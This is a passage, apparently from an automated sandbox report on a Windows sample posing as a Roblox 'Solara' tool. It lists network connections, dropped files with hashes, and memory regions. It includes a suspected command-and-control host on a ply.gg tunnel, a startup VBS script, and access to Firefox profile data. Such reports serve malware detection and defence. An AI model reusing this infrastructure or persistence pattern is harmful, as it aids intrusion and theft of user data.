| US | 128.116.45.3:443 | mia4-128-116-45-3.roblox.com | tcp |
| US | 8.8.8.8:53 | c0ak.rbxcdn.com | udp |
| BE | 23.14.90.104:443 | c0ak.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | a1913.dscw27.akamai.net | udp |
| US | 8.8.8.8:53 | a1913.dscw27.akamai.net | udp |
| BE | 23.14.90.104:443 | a1913.dscw27.akamai.net | tcp |
| US | 8.8.8.8:53 | b.ns1p.net | udp |
| DE | 35.156.47.220:443 | b.ns1p.net | tcp |
| US | 8.8.8.8:53 | 104.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.47.156.35.in-addr.arpa | udp |
| US | 147.185.221.20:22284 | anyone-blogging.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| US | 8.8.8.8:53 | clientsettings.roblox.com | udp |
| NL | 128.116.21.4:443 | clientsettings.roblox.com | tcp |
| US | 8.8.8.8:53 | roblox.com | udp |
| US | 8.8.8.8:53 | lax2-128-116-116-3.roblox.com | udp |
| GB | 128.116.119.4:443 | roblox.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | roblox.com | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | js.stripe.com | udp |
| US | 8.8.8.8:53 | dexeqbeb7giwr.cloudfront.net | udp |
| US | 3.161.82.126:443 | js.stripe.com | tcp |
| US | 3.161.82.126:443 | js.stripe.com | tcp |
| US | 8.8.8.8:53 | followings.roblox.com | udp |
| NL | 128.116.21.4:443 | followings.roblox.com | tcp |
| NL | 128.116.21.4:443 | followings.roblox.com | tcp |
| US | 8.8.8.8:53 | 126.82.161.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dexeqbeb7giwr.cloudfront.net | udp |
| NL | 128.116.21.4:443 | followings.roblox.com | udp |
| US | 8.8.8.8:53 | games.roblox.com | udp |
| NL | 128.116.21.4:443 | games.roblox.com | tcp |
| NL | 128.116.21.4:443 | games.roblox.com | udp |
| US | 8.8.8.8:53 | voice.roblox.com | udp |
| US | 8.8.8.8:53 | badges.roblox.com | udp |
| NL | 128.116.21.4:443 | badges.roblox.com | tcp |
| NL | 128.116.21.4:443 | badges.roblox.com | tcp |
| NL | 128.116.21.4:443 | badges.roblox.com | udp |
| US | 8.8.8.8:53 | a4c9427a-pulsar-pweb-4287-639546627.eu-central-1.elb.amazonaws.com | udp |
| NL | 128.116.21.4:443 | badges.roblox.com | udp |
| US | 8.8.8.8:53 | tr.rbxcdn.com | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| US | 8.8.8.8:53 | ams2-128-116-21-3.roblox.com | udp |
| US | 8.8.8.8:53 | nrt1-128-116-120-3.roblox.com | udp |
| US | 8.8.8.8:53 | c0ak.rbxcdn.com | udp |
| NL | 128.116.21.3:443 | ams2-128-116-21-3.roblox.com | tcp |
| US | 8.8.8.8:53 | ams2-128-116-21-3.roblox.com | udp |
| JP | 128.116.120.3:443 | nrt1-128-116-120-3.roblox.com | tcp |
| US | 8.8.8.8:53 | a1913.dscw27.akamai.net | udp |
| US | 8.8.8.8:53 | sea1-128-116-115-3.roblox.com | udp |
| US | 8.8.8.8:53 | ams2-128-116-21-3.roblox.com | udp |
| US | 8.8.8.8:53 | a1913.dscw27.akamai.net | udp |
| US | 8.8.8.8:53 | nrt1-128-116-120-3.roblox.com | udp |
| US | 128.116.115.3:443 | sea1-128-116-115-3.roblox.com | tcp |
| US | 8.8.8.8:53 | aws-eu-west-2b-lms.rbx.com | udp |
| US | 8.8.8.8:53 | c0aws.rbxcdn.com | udp |
| US | 8.8.8.8:53 | aws-eu-west-2a-lms.rbx.com | udp |
| JP | 128.116.120.3:443 | nrt1-128-116-120-3.roblox.com | tcp |
| US | 8.8.8.8:53 | cdg1-128-116-122-3.roblox.com | udp |
| GB | 35.179.56.112:443 | aws-eu-west-2a-lms.rbx.com | tcp |
| US | 8.8.8.8:53 | m.stripe.network | udp |
| FR | 128.116.122.3:443 | cdg1-128-116-122-3.roblox.com | tcp |
| US | 8.8.8.8:53 | realtime-signalr.roblox.com | udp |
| GB | 35.179.56.112:443 | aws-eu-west-2a-lms.rbx.com | tcp |
| NL | 128.116.21.4:443 | realtime-signalr.roblox.com | tcp |
| US | 8.8.8.8:53 | 3.21.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.120.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.115.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.122.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.56.179.35.in-addr.arpa | udp |
| GB | 18.175.38.169:443 | aws-eu-west-2b-lms.rbx.com | tcp |
| DE | 13.32.27.11:443 | c0aws.rbxcdn.com | tcp |
| US | 151.101.128.176:443 | m.stripe.network | tcp |
| GB | 18.175.38.169:443 | aws-eu-west-2b-lms.rbx.com | tcp |
| US | 8.8.8.8:53 | 11.27.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.128.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.38.175.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | m.stripe.com | udp |
| US | 44.229.0.33:443 | m.stripe.com | tcp |
| US | 8.8.8.8:53 | nrt1-128-116-120-3.roblox.com | udp |
| US | 8.8.8.8:53 | sea1-128-116-115-3.roblox.com | udp |
| US | 8.8.8.8:53 | nfd-prod-a-931214499.eu-west-2.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | 33.0.229.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | auth.roblox.com | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | kit-pro.fontawesome.com | udp |
| US | 8.8.8.8:53 | kit-pro.fontawesome.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | lax4-128-116-63-3.roblox.com | udp |
| US | 128.116.63.3:443 | lax4-128-116-63-3.roblox.com | tcp |
| US | 128.116.63.3:443 | lax4-128-116-63-3.roblox.com | tcp |
| US | 8.8.8.8:53 | nfd-prod-a-931214499.eu-west-2.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | sea1-128-116-115-3.roblox.com | udp |
| US | 8.8.8.8:53 | cdg1-128-116-122-3.roblox.com | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| US | 8.8.8.8:53 | 3.63.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdg1-128-116-122-3.roblox.com | udp |
| US | 8.8.8.8:443 | dns.google | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | kit-pro.fontawesome.com | udp |
| US | 8.8.8.8:53 | kit-pro.fontawesome.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | d13im6y9zsyqh9.cloudfront.net | udp |
| US | 8.8.8.8:53 | nfd-prod-b-1076442370.eu-west-2.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | nfd-prod-b-1076442370.eu-west-2.elb.amazonaws.com | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:53 | d13im6y9zsyqh9.cloudfront.net | udp |
| US | 8.8.8.8:53 | stripecdn.map.fastly.net | udp |
| US | 8.8.8.8:53 | stripecdn.map.fastly.net | udp |
| US | 8.8.8.8:53 | us-central-default-px.roblox.com | udp |
| US | 8.8.8.8:53 | m.stripe.com | udp |
| US | 8.8.8.8:53 | m.stripe.com | udp |
| US | 8.8.8.8:443 | dns.google | udp |
| US | 8.8.8.8:53 | lax4-128-116-63-3.roblox.com | udp |
| US | 8.8.8.8:53 | support.mozilla.org | udp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | kit-pro.fontawesome.com | udp |
| US | 151.101.65.229:443 | cdn.jsdelivr.net | tcp |
| US | 151.101.65.229:443 | cdn.jsdelivr.net | tcp |
| US | 151.101.65.229:443 | cdn.jsdelivr.net | tcp |
| US | 151.101.65.229:443 | cdn.jsdelivr.net | tcp |
| US | 172.64.147.188:443 | kit-pro.fontawesome.com | tcp |
| US | 8.8.8.8:53 | 229.65.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.147.64.172.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 147.185.221.20:22284 | anyone-blogging.gl.at.ply.gg | tcp |
| US | 147.185.221.20:22284 | anyone-blogging.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | roblox-api.arkoselabs.com | udp |
| US | 8.8.8.8:53 | c0ak.rbxcdn.com | udp |
| US | 8.8.8.8:53 | mia4-128-116-45-3.roblox.com | udp |
| US | 8.8.8.8:53 | setup.rbxcdn.com | udp |
| US | 13.224.189.58:443 | setup.rbxcdn.com | tcp |
| US | 13.224.189.58:443 | setup.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | ams2-128-116-21-3.roblox.com | udp |
| US | 8.8.8.8:53 | lax4-128-116-63-3.roblox.com | udp |
| US | 8.8.8.8:53 | 58.189.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | d19ha9ylcjiuiu.cloudfront.net | udp |
| US | 8.8.8.8:53 | d19ha9ylcjiuiu.cloudfront.net | udp |
| US | 8.8.8.8:53 | edge-term4-ams2.roblox.com | udp |
| US | 8.8.8.8:53 | d2w650xp5tniea.cloudfront.net | udp |
| US | 8.8.8.8:53 | a1913.dscw27.akamai.net | udp |
| US | 8.8.8.8:53 | a1913.dscw27.akamai.net | udp |
| US | 8.8.8.8:53 | d2w650xp5tniea.cloudfront.net | udp |
Files
memory/2920-0-0x0000000074BFE000-0x0000000074BFF000-memory.dmp
memory/2920-1-0x0000000000A00000-0x0000000000A0A000-memory.dmp
memory/2920-2-0x0000000074BF0000-0x00000000753A0000-memory.dmp
memory/2920-3-0x0000000074BFE000-0x0000000074BFF000-memory.dmp
memory/2920-8-0x0000000005EA0000-0x0000000005EAA000-memory.dmp
C:\Users\Admin\AppData\Local\Solara\Solara_Protect.bat
| MD5 | 49f8779d69c5572c5534a2b83f90334b |
| SHA1 | edbeaff47d9b2fe4244b9710e014924189c086b6 |
| SHA256 | e3120bc12c0d1c82b3d719e8d095fcee2bba9571d2ad85e9e2b1b2dae921cc49 |
| SHA512 | a34cb31c8bdccced3167a1df44e6635cf66ddc544246115639727611aab578e576e98297be42d9496971da4b35db5f8359b8b06499009d885269e3ad3e5fd6bc |
memory/2920-10-0x0000000074BF0000-0x00000000753A0000-memory.dmp
memory/4452-11-0x00000000034F0000-0x0000000003526000-memory.dmp
memory/4452-12-0x0000000074BF0000-0x00000000753A0000-memory.dmp
memory/4452-13-0x0000000074BF0000-0x00000000753A0000-memory.dmp
memory/4452-14-0x0000000005BA0000-0x00000000061C8000-memory.dmp
memory/4452-15-0x0000000005AD0000-0x0000000005AF2000-memory.dmp
memory/4452-17-0x0000000006330000-0x0000000006396000-memory.dmp
memory/4452-16-0x00000000062C0000-0x0000000006326000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hqidukhv.fud.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4452-23-0x00000000063A0000-0x00000000066F4000-memory.dmp
memory/4452-28-0x0000000006950000-0x000000000696E000-memory.dmp
memory/4452-29-0x0000000006E90000-0x0000000006EDC000-memory.dmp
memory/4452-36-0x00000000081A0000-0x000000000881A000-memory.dmp
memory/4452-37-0x0000000006F60000-0x0000000006F7A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\0ec98c56-3a64-4816-bb12-4b1c3a893a77
| MD5 | f453ec46f36200036cd6d59b5d73aafe |
| SHA1 | 2dea7381d5b714c08960484388ad91676b868fca |
| SHA256 | 6028c754bef96f0a541897c6b71fbaaf7c4b5f5c53f6fd6334855d01815306e6 |
| SHA512 | 85e78df5533a2ff1c15fad344676fd02827f915b5d06da5570e601d6e04d0f6e79273004add5aa183d957058813a3ca8443739adad4e4d28b7da4c9ebbc135b6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\3dff6eb0-6484-4bc5-a45f-9d03edc6db5d
| MD5 | dfa4cb5f17cde77fa7c1e0a9898512b3 |
| SHA1 | fb74d4fb0a3d2822b84698549293f1c407cd86e9 |
| SHA256 | 0e63344bd02b42a00fc75513a2a4b0533e56baacbbf8ca67e68cca808ac7138f |
| SHA512 | 09c8c036f57599100754f0dcffdd96c09398692dba7b6115aa4a43dee26c81de928cc56e708d46cea9550a174e86d65cea0bb697c1f5a165a964b2bbf1f37f71 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js
| MD5 | 1b2aa63855dd0e4e68ee435194888061 |
| SHA1 | 73acb63b3d1a79c013b7d0d33a11fbcb0fba1d29 |
| SHA256 | 21d083a88a4e86432c9d44029fdb34aa3835334a21645f4d60da28a36dad62a9 |
| SHA512 | 303c8ad731b0808673277dc66768c086c4dc1419aaa0bc784915bdfd638f9f0ce2339057d2b386f8860a5e9d84fa65a4a1d78b1bda16b1f4629567b3730cd233 |
memory/4452-94-0x00000000057E0000-0x00000000057E8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\db\data.safe.bin
| MD5 | fa999fc17537f190a4f3c4db42b23d68 |
| SHA1 | 04a8c3d7962c5adfcdb8020af86555fb83a13388 |
| SHA256 | ea4090f5169e9706a80908f9dadbf7144983a20cae7b8ba347a969fcbca9e74e |
| SHA512 | 842fa1eddb890797a78890bb150c87f4e8af8e12108c9851ce37e097b69ae690b57b509eb5b9706eac76de3cbbab1c3d102ae2cafcb25b495ea6c72710beb97a |
memory/4452-114-0x0000000007B90000-0x0000000007BA0000-memory.dmp
memory/4452-115-0x0000000009B20000-0x000000000A0C4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js
| MD5 | 2103b0a7d20609a754bca2f10a0d48f4 |
| SHA1 | 89e2764259b17a4c11abee66ba06db2ef0e18228 |
| SHA256 | fe84e50e9175779bfe8ccc20d2acf44861ab9c3c095e444ebe2d2cc3626508e6 |
| SHA512 | d18af7837afc7d17b0db2c4e1191844c8d250c58abeefaa55dd63aa27f8039fd8dc185b7bd7465e1f4e376e348eff3f289343c601b8a0fa670b16dccdd088fcf |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | 69fa8a80fc20d2133a54e83d019949b3 |
| SHA1 | 3a4b0c1a3ecfd3d8c6c80e1d96046a519faee14c |
| SHA256 | 80fc5fb38b032e1f7b96ed367de156d45893790c2e079d2c95083379dbfdb0ff |
| SHA512 | 159e51c05c2d530021787a12b3a65816d8a945852a0e3a2edc5e9d2bef73517ebea4702d84bafeb189474bdc7c50eba724f6f72bdd0b1a3e1dca6a71db43afbb |
memory/5760-153-0x000000006FC60000-0x000000006FCAC000-memory.dmp
memory/5760-152-0x00000000075D0000-0x0000000007602000-memory.dmp
memory/5760-163-0x0000000007590000-0x00000000075AE000-memory.dmp
memory/5760-168-0x0000000007610000-0x00000000076B3000-memory.dmp
memory/5760-169-0x00000000077A0000-0x00000000077AA000-memory.dmp
memory/5760-170-0x00000000079D0000-0x0000000007A66000-memory.dmp
memory/5760-171-0x0000000007940000-0x0000000007951000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 115e5498e77917819a39b00e139d09df |
| SHA1 | f3b6c69a637bda98ed1af598eef3966d6509d545 |
| SHA256 | 9b582db1eebbfb312b8543649fcc179c45bc736778ee66fd5703ea20a1d88857 |
| SHA512 | 675e0336309392ade99ae6af69ade0527bc8a78f63cbb9eac27b66c19b9c58bc31f1491aab572a50590206aa2328093380866336f60cce413f1d3e9f06495a60 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 22eea905ffa77c5a3385f0832a02957b |
| SHA1 | 9bd5136178cfd691d459cf4a9b5c99d8b904a5d7 |
| SHA256 | de772b39357ac3dfc03ff2dbe2abaf011883c63321a7983dbe2934f3e0d3016f |
| SHA512 | 6dee71fb6a16b4f17a52f1abfe76233270b6bec08f2cf8822ad8e62ebd70a9a9409cf31ab2c2fdc18ed9f428c98c3bd0c942e7f25099d292fe2ad50155fcba1c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 9751fcb3d8dc82d33d50eebe53abe314 |
| SHA1 | 7a680212700a5d9f3ca67c81e0e243834387c20c |
| SHA256 | ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7 |
| SHA512 | 54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709 |
C:\Users\Admin\AppData\Roaming\startup_str_469.vbs
| MD5 | 4fdee6b7bce22ef5c841f6f4e08237db |
| SHA1 | 5ecd2878bde47b8a83af5b1d226fce0b2c28636d |
| SHA256 | 7c50b17be1e8d334e9b85b7b5a3f1384eb9d2f1acdbd8808defb48e925279ddf |
| SHA512 | a6e408acf51f21db099e2de4c4ee185528bc45c89ecd635cf6acd1e1fccdbf0e35c0ec97af54977cd0c680f5ffc517521d76acb020f90a5aac1bb55b4799db2e |
memory/4452-384-0x0000000074BF0000-0x00000000753A0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 602fb8eff263552dfb2f80d05ff5cbee |
| SHA1 | 727b5de1f0f44463b7246eac182a5b442d837cb1 |
| SHA256 | d05d854cf14a24c1fb192777b1d1a27363ece0f446ca406f6d59bfb1bb4c3a99 |
| SHA512 | 7c1514e59fb92450142a8d695283db4d24d7c695dd5f8ddae0ea05a385007e6a28a6bcf5661f892d8af370eccdf15b65dabc912331b098db3cf0afeb41f7442f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | ac5a44f310a8e1598c2ae227ea1661ac |
| SHA1 | 2ee2ca8b0adbdaa292778b46a71f00dceee19736 |
| SHA256 | fc20214d7c1f2da8dae8245b90858c705c906bb6940fe3615bf531ddec77a75e |
| SHA512 | 952919437dafe119f647c796f84b66249e416e884208b8a0663566ba2a6917f20aa89d4fed12f3cd68e3fef8a106f81bb45efe5b4efcbf3a0ee59f75b5280f6a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 37d6851f0bd03c12c867836d9dbc67a7 |
| SHA1 | cc14c032e5fa9469c2dbe087c3bce1ac6efcdc87 |
| SHA256 | cdca1d1f5d928c37aa115a224d41cd685becac86826b0785f0427665c6426709 |
| SHA512 | 8fbd21d40db8bc832fb09e76d12722fc13e44aaadaf1d4db45d65b4ac1d13994734bb19f4bc30d37f1cf875fca514aee5884dd288908dafce6d358207e104531 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 62a0a66059d5ad2f0cf85cc18c75f60c |
| SHA1 | 117f7782c0e8aabd87a97eed04ef407959d09e5d |
| SHA256 | 56384ea8620686a48ee3494059b69dece444c21c3b06265d58f5fcb221967010 |
| SHA512 | 0eb977746479a7c82d76af0b4e24d6be82280d81042cca6ba68f47d3b82e340539c45c6cb25dad4b51200176ada6bd11848c1faaa356927d48f049e0a264ffb0 |
memory/2108-584-0x00000000061D0000-0x0000000006524000-memory.dmp
memory/2108-589-0x0000000006A20000-0x0000000006A6C000-memory.dmp
memory/2108-590-0x0000000007BE0000-0x0000000007BF4000-memory.dmp
memory/2108-591-0x0000000007C90000-0x0000000007D2C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\default\https+++www.roblox.com\idb\3140325527hBbDa.sqlite
| MD5 | bf196629d05eed1377b1279b1ff897bc |
| SHA1 | ad2b8360ad6a656a12ce5560306aeddbe670614a |
| SHA256 | f99b4b98f259613f070aaa162f865ee0d2119d28b3aeb8277783b62ba3238351 |
| SHA512 | caff5c7a3b057a294b9da85124c4aeddd6c0983ce7fe75968af66755093eb15f8a09d8d012af088f8abd435b9d4ab57b8e34b9573dbecb842bae6e9bfd75c10a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 5fd6c139a4d8ab6c09b695d2a1424b4c |
| SHA1 | 793f3db530d0cb7811af7a567b69458c021f563d |
| SHA256 | 04f375482f36ac057cf7ee0e69a5a1017fd81dadb55ddcc9db1388cd33872849 |
| SHA512 | 84d9f8627e1a4bd992425e070693d8beb2d88feb839ef31550d3c1b0703517bf54b72e5ac4735694d2b137f05a5992ac3bf880224fe949fc31df7b884e6540c3 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\15788
| MD5 | b6aa11e67d61f24a23ace1021af326f6 |
| SHA1 | 93aaaf1a6e01e4c243ac03a87735f13ac6899ff9 |
| SHA256 | 95a284315fd925e5b6d7c34e6b409d2db03f240f5a42333ae3d5331371cc26c1 |
| SHA512 | d2ec463dc84f6eb82ba89ce46a6ef1d2e617f57383dcf1e8da29d292d10984285b109143406b5df40250b65e5f9e84c1cffa31cf235141982992d3e076d6b097 |
memory/4816-640-0x000000006FC50000-0x000000006FC9C000-memory.dmp
memory/4816-650-0x0000000006F80000-0x0000000007023000-memory.dmp
memory/4816-653-0x00000000072C0000-0x00000000072D1000-memory.dmp
memory/4816-655-0x00000000072F0000-0x00000000072FE000-memory.dmp
memory/4816-656-0x0000000007300000-0x0000000007314000-memory.dmp
memory/4816-657-0x0000000007340000-0x000000000735A000-memory.dmp
memory/4816-658-0x0000000007330000-0x0000000007338000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 35ca10002bc51a9e42e5392ef696c43e |
| SHA1 | 04a227712c93135eefdce3486b45cdd23c94751b |
| SHA256 | 4441391c9db0e553148b57d1359bb0737726f1de3eb28864196d7381b606bcca |
| SHA512 | 23d2f3c45b91be7a62582ffe5dff2b5002c00df7d4fb3fea23d59579b6b2e932babb2678ff28e598d9f171329dbcbe7fce246759285f6599cbe7e1c81b5777e5 |
memory/5824-676-0x000000006FC50000-0x000000006FC9C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 361239beb8c75f4d9c95197ae524d6e9 |
| SHA1 | ce34c0a7c550a4ece2562d9186f39306e7062e1b |
| SHA256 | 14943fa82b9c5bb38e9450e980c1586bc9766ee3289c6dd71eeed8349cf302a8 |
| SHA512 | 986a5aeb0a22f7f00f50e9c28056c1a01313af3a7bac2d9ad28368276ca6dd884451001f15b793068d7ef0d5df0a65f03140e2235990bd4a992f5b61c6f7d10a |
memory/5184-702-0x000000006FC50000-0x000000006FC9C000-memory.dmp
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\27586
| MD5 | 98486167e9b2ec42c1486105adb33be2 |
| SHA1 | 1ef4f55bd2bcfdf4a4ed0801e97d3a4a1849fcd1 |
| SHA256 | f2bd999d7d7c8a04a6ee9bb268d4411282f8240795b85f5d6d21a10f6ff08466 |
| SHA512 | d357fce7afd15eeea04f36976235300ff358f818c2640f6932055a661be6015253f75c548991b3b6bc4bc0d2fb245f47d3a8f1a810fcff896a1ee3e2a352a604 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 7b19499ad4df3053d4eb37b63eac149f |
| SHA1 | 550b34ae608235afe7e1a17c10de8a20956ced73 |
| SHA256 | cafe61fa7461612c72449b411c365fb4e607358d8e414b0883188d1aba09db63 |
| SHA512 | 00b79378a73eb2eed9516f82a8ad2719df596f75d546d27a7cd9250a7b4c83ff2456b37961e73eff6600277ac492b66c762b0d9dc1ff66f424360d6467182f36 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 98cea9206d332b6559761ee7a9110e0d |
| SHA1 | 2e8e7574ff6fa3a34c80771e4f1c0354a839d8f9 |
| SHA256 | de7a5d0c6327ed2f94a70480314908f38c7c7d3bd1f4560e33f4b99758af87da |
| SHA512 | e1b1507aae5553d6dc374bba9fd5251658ce0bcc7418660df6d4a347d8f28bfe35f90014ddc43b44b1636459825b0acf42574cd0e520f36faa398635f32b9b10 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 06ad34f9739c5159b4d92d702545bd49 |
| SHA1 | 9152a0d4f153f3f40f7e606be75f81b582ee0c17 |
| SHA256 | 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba |
| SHA512 | c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\2699
| MD5 | aac40eb19a49b4a56d9dc03774dd9a70 |
| SHA1 | ab457bbb061db8ec6e344c524fb6a04dba266257 |
| SHA256 | a50a6f81557312d2bae250777c7257622f605162da4b01ce391a0cf65f6f0526 |
| SHA512 | ae413dc6645152afd21cb754a3553fd5a65e5b660495240533a494427bebabf2a0be45f7897e2371232b85e81666d567da4f8c60c93fc130082572e457fa2dc9 |
memory/3800-975-0x000000006FC50000-0x000000006FC9C000-memory.dmp
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\14395
| MD5 | dcae8de148e0324287351f6e0b470e0c |
| SHA1 | 20fd2d3538bc0fb22437375229c733e549699df1 |
| SHA256 | 96092e6f1a58f51a0b4db3660df7714a4ee570aa53796efa193b04c1f3fb7796 |
| SHA512 | dc3ffd05210a8438146041c53c5520b5f19c78c57b0af4f455ffd9879b90692fbad873d9dc766871bffa797c89751b82236348a91d148683babb5c655cc76900 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\0D0C8B41B123A60A76177A339C5D673D74E526C6
| MD5 | 533739e4a95abf74610506cac11451cc |
| SHA1 | b77cf92924125e6f7819d6508f4786c3c7e0078f |
| SHA256 | 46020e0f84858139316030d83b8caed4e84221b0e05706ae1a59728ec2cd81fa |
| SHA512 | 199f64aa53b8030e0444f2cd9fdbf152ccfa469d1c592fcca74b092ad4a1f650dea5931314606b56cade57b6f162387c7f0d9cc2a096c5cbf76d2a016730dea4 |
memory/2108-1074-0x0000000008720000-0x00000000087B2000-memory.dmp
memory/2108-1075-0x0000000007F50000-0x0000000007F5A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | c56c7e58bdbcfb97938afc75a7b9b300 |
| SHA1 | feecae2a6b17869e4c3315c7ab5c9667cabc8e6f |
| SHA256 | 750898d92ba962fd59a0ab0cf2c8a2a44208f878bd55b42f3052ef082abc732c |
